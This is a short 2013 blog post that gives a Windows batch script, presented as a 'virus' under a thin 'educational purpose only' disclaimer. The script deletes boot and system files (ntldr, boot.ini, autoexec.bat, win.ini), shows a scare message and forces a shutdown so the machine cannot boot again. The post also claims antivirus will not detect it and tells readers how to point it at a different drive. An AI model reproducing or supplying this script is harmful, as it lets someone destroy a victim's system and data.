Friday, 25 January 2013

5) Virus To Crash Any Once PC ;-)

Try at your own risk. I am not responsible for your own deeds. For educational purpose only.


 



--@ Hacker Brijesh Joshihi
A game with urself using dos commands. Play this game at your own risk.

Open Notepad-

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
@echo off
msg * YOUR COMP IS CRASHING
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive

save as Anything.bat file

This will shut down the computer never to reboot again!

Type this in notepad and save as with this name .bat
The antivirus will not detect this virus as it is only a code.

Basically this program will delete all that files which are needed for booting
If your operating system is installed in d drive instead of c then replace c with d.

For any queries ask questions freely... Thank You

No comments:

Post a Comment